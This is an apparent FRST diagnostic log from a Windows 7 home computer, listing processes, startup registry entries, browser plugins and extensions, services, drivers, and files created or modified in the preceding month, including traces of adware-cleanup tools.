(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\OUTLOOK.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [FAHConsole] => C:\Program Files\File Association Helper\FAHConsole.exe [729272 2014-01-28] (Nico Mak Computing)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\Run: [Spotify Web Helper] => C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1514040 2014-10-03] (Spotify Ltd)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {496991f1-83b7-11e3-a045-406186b70622} - H:\autorun.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {6140cd31-99d4-11e3-ac34-406186b70622} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {efd7f59c-3f87-11e4-aca2-406186b70622} - F:\Startme.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-27] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: iSkysoft Video Converter Ultimate 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
 
FireFox:
========
FF ProfilePath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\f5sas9dj.default-1413430386450
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @java.com/JavaPlugin,version=10.17.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @abr.gov.au/KeyMgmtPlugin -> C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]
FF Extension: iSkysoft Video Converter Ultimate - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected] [2014-09-30]
 
Chrome: 
=======
CHR Profile: C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (SEOquake) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2014-03-24]
CHR Extension: (Google Docs) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-25]
CHR Extension: (Google Drive) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-25]
CHR Extension: (YouTube) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-25]
CHR Extension: (Google Search) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-25]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2014-04-21]
CHR Extension: (Google Wallet) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-25]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Hamachi2Svc; D:\Games\LogMeIn Hamachi\hamachi-2.exe [2525008 2014-09-04] (LogMeIn Inc.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-01-23] (Disc Soft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-16 14:17 - 2014-10-16 14:26 - 00041051 _____ () C:\zoek-results.log
2014-10-16 14:16 - 2014-10-16 14:16 - 00000000 ____D () C:\zoek_backup
2014-10-16 13:54 - 2014-10-16 13:54 - 01705698 _____ (Thisisu) C:\Users\Mitey Fresh\Downloads\JRT (1).exe
2014-10-16 12:32 - 2014-10-16 12:32 - 00000000 ____D () C:\Users\Mitey Fresh\Downloads\FRST-OlderVersion
2014-10-15 15:42 - 2014-10-15 15:43 - 00026829 _____ () C:\Users\Mitey Fresh\Downloads\Addition.txt
2014-10-15 15:39 - 2014-10-17 08:46 - 00000000 ____D () C:\FRST
2014-10-15 15:39 - 2014-10-15 15:43 - 00030035 _____ () C:\Users\Mitey Fresh\Downloads\FRST.txt
2014-10-15 13:08 - 2014-10-10 13:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:08 - 2014-10-10 13:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:08 - 2014-10-10 13:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:08 - 2014-10-07 13:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:08 - 2014-10-07 13:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:08 - 2014-09-26 09:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:08 - 2014-09-26 09:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:08 - 2014-09-26 09:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:08 - 2014-09-26 09:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:08 - 2014-09-26 09:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:08 - 2014-09-26 09:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:08 - 2014-09-26 09:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:08 - 2014-09-19 13:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:08 - 2014-09-19 12:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:08 - 2014-09-19 12:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:08 - 2014-09-19 12:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:08 - 2014-09-19 12:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:08 - 2014-09-19 12:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:08 - 2014-09-19 12:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:08 - 2014-09-19 12:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:08 - 2014-09-19 12:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:08 - 2014-09-19 12:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:08 - 2014-09-19 12:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:08 - 2014-09-19 12:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:08 - 2014-09-19 12:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:08 - 2014-09-19 12:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:08 - 2014-09-19 12:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:08 - 2014-09-19 12:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:08 - 2014-09-19 12:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:08 - 2014-09-19 12:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:08 - 2014-09-19 12:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:08 - 2014-09-19 12:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:08 - 2014-09-19 12:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:08 - 2014-09-19 12:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:08 - 2014-09-19 12:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:08 - 2014-09-19 12:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:08 - 2014-09-19 12:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:08 - 2014-09-19 12:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:08 - 2014-09-19 11:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:08 - 2014-09-19 11:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:08 - 2014-09-19 11:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:08 - 2014-09-19 11:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:08 - 2014-09-19 11:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:08 - 2014-09-19 11:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:08 - 2014-09-19 11:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:08 - 2014-09-19 11:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:08 - 2014-09-19 11:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:08 - 2014-09-19 11:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:08 - 2014-09-19 11:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:08 - 2014-09-19 11:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:08 - 2014-09-19 11:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:08 - 2014-09-19 11:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:08 - 2014-09-19 11:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:08 - 2014-09-19 11:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:08 - 2014-09-19 11:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:08 - 2014-09-19 10:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:08 - 2014-09-19 10:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:08 - 2014-09-19 10:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:08 - 2014-09-19 10:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:07 - 2014-09-18 13:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:07 - 2014-09-18 12:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:07 - 2014-09-13 12:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:07 - 2014-09-13 12:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-15 13:07 - 2014-09-04 16:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:07 - 2014-09-04 16:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:07 - 2014-07-17 13:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:07 - 2014-07-17 13:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:07 - 2014-07-17 13:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:07 - 2014-07-17 12:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:07 - 2014-07-17 12:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:07 - 2014-07-17 12:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:07 - 2014-07-17 12:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:07 - 2014-07-17 12:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-14 21:36 - 2014-10-14 21:36 - 00000052 _____ () C:\Users\Mitey Fresh\Desktop\geoguesser.txt
2014-10-12 22:27 - 2014-10-16 12:12 - 00000652 _____ () C:\Users\Mitey Fresh\Desktop\cruise holiday.txt
2014-10-10 13:08 - 2014-10-10 15:14 - 00062372 _____ () C:\Users\Mitey Fresh\Downloads\Extras.Txt
2014-10-10 13:07 - 2014-10-14 16:34 - 00215754 _____ () C:\Users\Mitey Fresh\Downloads\OTL.Txt
2014-10-10 12:57 - 2014-10-10 12:58 - 00602112 _____ (OldTimer Tools) C:\Users\Mitey Fresh\Downloads\OTL.exe
2014-10-01 14:52 - 2014-10-02 13:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\WinZip
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\ProgramData\WinZip
2014-10-01 14:51 - 2014-10-01 14:51 - 00002293 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2014-10-01 14:51 - 2014-10-01 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 14:50 - 2014-10-01 14:51 - 00000000 ____D () C:\Program Files\WinZip
2014-10-01 14:49 - 2014-10-01 14:49 - 00873680 _____ ( ) C:\Users\Mitey Fresh\Downloads\winzip18-home (2).exe
2014-10-01 14:06 - 2014-10-01 14:07 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (2).exe
2014-10-01 14:06 - 2014-10-01 14:06 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-10-01 13:00 - 2014-10-01 13:01 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-01 09:33 - 2014-09-25 13:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 09:33 - 2014-09-25 12:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-09-30 17:15 - 2014-10-09 09:03 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Mitey Shield video
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\iSkysoft
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:12 - 00000000 ____D () C:\ProgramData\iSkysoft Video Converter Ultimate
2014-09-30 17:06 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:06 - 00000000 ____D () C:\Program Files (x86)\iSkysoft
2014-09-30 17:06 - 2013-08-23 14:36 - 00721263 _____ () C:\Windows\SysWOW64\ISCM64.dll
2014-09-30 17:06 - 2013-08-07 15:31 - 00214528 _____ () C:\Windows\SysWOW64\ISCM32.dll
2014-09-30 17:05 - 2014-09-30 17:05 - 00000000 ____D () C:\Users\Public\Documents\iSkysoft
2014-09-30 17:04 - 2014-09-30 17:05 - 01347936 _____ (iSkysoft) C:\Users\Mitey Fresh\Downloads\video-converter-ultimate-win_setup_full670.exe
2014-09-29 21:19 - 2014-09-29 21:20 - 00262144 _____ () C:\Windows\Minidump\092914-17940-01.dmp
2014-09-29 19:47 - 2014-09-30 17:12 - 00076441 _____ () C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
2014-09-24 13:04 - 2014-09-10 09:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 13:04 - 2014-09-10 08:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-09-22 18:48 - 2014-09-29 16:37 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\vlc
2014-09-22 18:46 - 2014-09-22 18:47 - 00000000 ____D () C:\Program Files (x86)\VLC
2014-09-22 18:45 - 2014-09-22 18:46 - 24743106 _____ () C:\Users\Mitey Fresh\Downloads\vlc-2.1.5-win32.exe
2014-09-19 12:42 - 2014-09-19 12:42 - 00332782 _____ () C:\Users\Mitey Fresh\Downloads\export (9).wav
2014-09-19 12:40 - 2014-09-19 12:41 - 00383026 _____ () C:\Users\Mitey Fresh\Downloads\export (8).wav
2014-09-19 12:35 - 2014-09-19 12:35 - 00386092 _____ () C:\Users\Mitey Fresh\Downloads\169905__lauriesafari__reallyareyoukidding.wav
2014-09-19 12:22 - 2014-09-19 12:22 - 00354138 _____ () C:\Users\Mitey Fresh\Downloads\export (7).wav
2014-09-18 18:13 - 2014-09-18 18:13 - 00354690 _____ () C:\Users\Mitey Fresh\Downloads\export (6).wav
2014-09-18 18:08 - 2014-09-18 18:08 - 00353600 _____ () C:\Users\Mitey Fresh\Downloads\export (5).wav
2014-09-18 18:05 - 2014-09-18 18:05 - 00391048 _____ () C:\Users\Mitey Fresh\Downloads\export (4).wav
2014-09-18 18:02 - 2014-09-18 18:02 - 00353230 _____ () C:\Users\Mitey Fresh\Downloads\export (3).wav
2014-09-18 18:00 - 2014-09-18 18:00 - 00354016 _____ () C:\Users\Mitey Fresh\Downloads\export (2).wav
2014-09-18 17:58 - 2014-09-18 17:58 - 00570378 _____ () C:\Users\Mitey Fresh\Downloads\232115__tec-studios__electronic-pounding-sound-mono (1).wav
2014-09-18 17:50 - 2014-09-18 17:52 - 00469382 _____ () C:\Users\Mitey Fresh\Downloads\35622__fresco__running-water-tap-by-fresco.wav
2014-09-18 17:43 - 2014-09-18 17:43 - 00395790 _____ () C:\Users\Mitey Fresh\Downloads\export (1).wav
2014-09-18 17:01 - 2014-09-18 17:01 - 00354976 _____ () C:\Users\Mitey Fresh\Downloads\export.wav
2014-09-18 15:02 - 2014-09-18 15:02 - 00048140 _____ () C:\Users\Mitey Fresh\Downloads\50775__smcameron__drips2.ogg
2014-09-17 09:37 - 2014-09-26 13:08 - 00000004 _____ () C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-17 08:28 - 2013-03-27 17:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-17 08:18 - 2013-03-26 15:55 - 01670506 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 08:15 - 2014-02-25 16:36 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-17 08:10 - 2013-03-18 19:16 - 00365056 _____ () C:\Users\Mitey Fresh\Desktop\Food diary.xls
2014-10-17 08:09 - 2014-03-06 10:57 - 00000598 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
2014-10-17 08:08 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-17 08:08 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-17 08:05 - 2009-07-14 16:13 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-17 08:01 - 2014-02-24 08:03 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\LogMeIn Hamachi
2014-10-17 08:00 - 2014-02-25 16:36 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-17 08:00 - 2013-03-27 16:54 - 00435066 _____ () C:\Windows\PFRO.log
2014-10-17 08:00 - 2009-07-14 16:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-17 08:00 - 2009-07-14 15:51 - 00104831 _____ () C:\Windows\setupact.log
2014-10-16 22:09 - 2013-03-31 13:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Spotify
